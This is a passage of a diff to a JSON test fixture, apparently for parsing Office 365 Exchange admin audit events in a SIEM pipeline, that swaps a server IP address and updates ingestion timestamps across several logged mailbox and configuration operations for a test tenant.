(Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", @@ -5583,12 +5583,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -5620,7 +5620,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { 
@@ -5632,8 +5632,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177772700Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:55\",\"ExternalAccess\":true,\"Id\":\"0caecd44-0161-44e5-0e45-08d7ac0f49d6\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Admin Audit Log Settings\",\"Operation\":\"Set-AdminAuditLogConfig\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"IgnoreDehydratedFlag\",\"Value\":\"True\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com\"},{\"Name\":\"AdminAuditLogEnabled\",\"Value\":\"True\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": "2021-12-09T13:42:30.853338400Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:55\",\"ExternalAccess\":true,\"Id\":\"0caecd44-0161-44e5-0e45-08d7ac0f49d6\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Admin Audit Log Settings\",\"Operation\":\"Set-AdminAuditLogConfig\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"IgnoreDehydratedFlag\",\"Value\":\"True\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com\"},{\"Name\":\"AdminAuditLogEnabled\",\"Value\":\"True\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM 
(Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", @@ -5653,12 +5653,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -5689,7 +5689,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { 
@@ -5701,8 +5701,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177775700Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:24\",\"ExternalAccess\":true,\"Id\":\"2cb36c1c-1368-4483-9801-08d7adfc11fe\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\ExchangeAssistance15\",\"Operation\":\"Set-ExchangeAssistanceConfig\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"Identity\",\"Value\":\"testsiem.onmicrosoft.com\"},{\"Name\":\"PrivacyStatementURL\",\"Value\":\"http://go.microsoft.com/fwlink/?LinkID=259417\"},{\"Name\":\"PrivacyLinkDisplayEnabled\",\"Value\":\"True\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": "2021-12-09T13:42:30.853344300Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:24\",\"ExternalAccess\":true,\"Id\":\"2cb36c1c-1368-4483-9801-08d7adfc11fe\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\ExchangeAssistance15\",\"Operation\":\"Set-ExchangeAssistanceConfig\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"Identity\",\"Value\":\"testsiem.onmicrosoft.com\"},{\"Name\":\"PrivacyStatementURL\",\"Value\":\"http://go.microsoft.com/fwlink/?LinkID=259417\"},{\"Name\":\"PrivacyLinkDisplayEnabled\",\"Value\":\"True\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM 
(Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", @@ -5722,12 +5722,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -5759,7 +5759,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { 
@@ -5771,8 +5771,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177780500Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:23\",\"ExternalAccess\":true,\"Id\":\"80d8b808-c24c-4359-24cf-08d7adfc11e3\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Recipient Quota Policy\",\"Operation\":\"Set-RecipientEnforcementProvisioningPolicy\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"IgnoreDehydratedFlag\",\"Value\":\"True\"},{\"Name\":\"Identity\",\"Value\":\"testsiem.onmicrosoft.com\\\\Recipient Quota Policy\"},{\"Name\":\"PublicFolderHierarchyMailboxCountQuota\",\"Value\":\"100\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": "2021-12-09T13:42:30.853350400Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:23\",\"ExternalAccess\":true,\"Id\":\"80d8b808-c24c-4359-24cf-08d7adfc11e3\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Recipient Quota Policy\",\"Operation\":\"Set-RecipientEnforcementProvisioningPolicy\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"IgnoreDehydratedFlag\",\"Value\":\"True\"},{\"Name\":\"Identity\",\"Value\":\"testsiem.onmicrosoft.com\\\\Recipient Quota Policy\"},{\"Name\":\"PublicFolderHierarchyMailboxCountQuota\",\"Value\":\"100\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM 
(Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", @@ -5792,12 +5792,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -5827,7 +5827,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { 
@@ -5839,8 +5839,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177783500Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:24\",\"ExternalAccess\":true,\"Id\":\"a9fb5fce-4ce4-43eb-f429-08d7adfc122c\",\"ObjectId\":\"testsiem.onmicrosoft.com\",\"Operation\":\"Set-TenantObjectVersion\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": "2021-12-09T13:42:30.853356100Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:24\",\"ExternalAccess\":true,\"Id\":\"a9fb5fce-4ce4-43eb-f429-08d7adfc122c\",\"ObjectId\":\"testsiem.onmicrosoft.com\",\"Operation\":\"Set-TenantObjectVersion\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", 
@@ -5860,12 +5860,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -5897,7 +5897,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { 
@@ -5909,8 +5909,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177786500Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:49\",\"ExternalAccess\":true,\"Id\":\"5f84ceaa-e6df-4ba1-1085-08d7ac0f4646\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/DiscoverySearchMailbox{D919BA05-46A6-415f-80AD-7E09334BB852}\",\"Operation\":\"Add-MailboxPermission\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/DiscoverySearchMailbox{D919BA05-46A6-415f-80AD-7E09334BB852}\"},{\"Name\":\"User\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/Discovery Management\"},{\"Name\":\"AccessRights\",\"Value\":\"FullAccess\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": "2021-12-09T13:42:30.853361900Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:49\",\"ExternalAccess\":true,\"Id\":\"5f84ceaa-e6df-4ba1-1085-08d7ac0f4646\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/DiscoverySearchMailbox{D919BA05-46A6-415f-80AD-7E09334BB852}\",\"Operation\":\"Add-MailboxPermission\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 
(67.43.156.13)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/DiscoverySearchMailbox{D919BA05-46A6-415f-80AD-7E09334BB852}\"},{\"Name\":\"User\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/Discovery Management\"},{\"Name\":\"AccessRights\",\"Value\":\"FullAccess\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", @@ -5930,12 +5930,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -5965,7 +5965,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { 
@@ -5977,8 +5977,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177789300Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:49\",\"ExternalAccess\":true,\"Id\":\"1c7412a6-858d-49ff-3f93-08d7ac0f45bf\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/DiscoverySearchMailbox{D919BA05-46A6-415f-80AD-7E09334BB852}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/DiscoverySearchMailbox{D919BA05-46A6-415f-80AD-7E09334BB852}\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": "2021-12-09T13:42:30.853367600Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:49\",\"ExternalAccess\":true,\"Id\":\"1c7412a6-858d-49ff-3f93-08d7ac0f45bf\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/DiscoverySearchMailbox{D919BA05-46A6-415f-80AD-7E09334BB852}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted 
Organizations/testsiem.onmicrosoft.com/DiscoverySearchMailbox{D919BA05-46A6-415f-80AD-7E09334BB852}\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", @@ -5998,12 +5998,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -6035,7 +6035,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { 
@@ -6047,8 +6047,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177792100Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:55\",\"ExternalAccess\":true,\"Id\":\"0caecd44-0161-44e5-0e45-08d7ac0f49d6\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Admin Audit Log Settings\",\"Operation\":\"Set-AdminAuditLogConfig\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"IgnoreDehydratedFlag\",\"Value\":\"True\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com\"},{\"Name\":\"AdminAuditLogEnabled\",\"Value\":\"True\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": "2021-12-09T13:42:30.853373300Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:55\",\"ExternalAccess\":true,\"Id\":\"0caecd44-0161-44e5-0e45-08d7ac0f49d6\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Admin Audit Log Settings\",\"Operation\":\"Set-AdminAuditLogConfig\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"IgnoreDehydratedFlag\",\"Value\":\"True\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com\"},{\"Name\":\"AdminAuditLogEnabled\",\"Value\":\"True\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM 
(Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", @@ -6068,12 +6068,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -6116,7 +6116,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { 
@@ -6128,8 +6128,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177794700Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:12\",\"ExternalAccess\":true,\"Id\":\"7386959b-a0d0-459e-baf8-08d7adfc0b4b\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/SystemMailbox{D0E409A0-AF9B-4720-92FE-AAC869B0D201}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"OMEncryptionStore\",\"Value\":\"True\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/SystemMailbox{D0E409A0-AF9B-4720-92FE-AAC869B0D201}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": 
"2021-12-09T13:42:30.853379Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:12\",\"ExternalAccess\":true,\"Id\":\"7386959b-a0d0-459e-baf8-08d7adfc0b4b\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/SystemMailbox{D0E409A0-AF9B-4720-92FE-AAC869B0D201}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"OMEncryptionStore\",\"Value\":\"True\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/SystemMailbox{D0E409A0-AF9B-4720-92FE-AAC869B0D201}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", 
@@ -6149,12 +6149,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -6197,7 +6197,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { 
@@ -6209,8 +6209,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177797500Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:15\",\"ExternalAccess\":true,\"Id\":\"7b5e608f-0a09-4251-8922-08d7adfc0d15\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 